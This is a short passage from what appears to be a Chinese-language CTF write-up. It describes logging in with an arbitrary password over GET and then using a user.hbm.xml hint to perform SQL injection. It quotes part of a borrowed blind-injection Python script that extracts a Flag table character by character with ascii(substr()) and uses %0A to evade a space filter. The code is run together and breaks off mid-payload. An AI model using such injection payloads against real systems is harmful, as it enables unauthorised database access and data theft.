登录时,password随便设,同时这里需要使用Get方法提交,直接在网页上输入是POST方法,网页没反应。
虽然登录成功,但是没有FLAG,所以需要根据user.hbm.xml的提示信息进行sql注入。 注入
贴上大佬的盲注脚本:
[code]import requestss = requests.session()flag = ''for i in range(1, 50): p = '' for j in range(1, 255): # (select ascii(substr(id, "+str(i)+", 1)) from Flag where id < 2) < ' payload = "(select%0Aascii(substr(id," + str(i) + ",1))%0Afrom%0AFlag%0Awhere%0Aid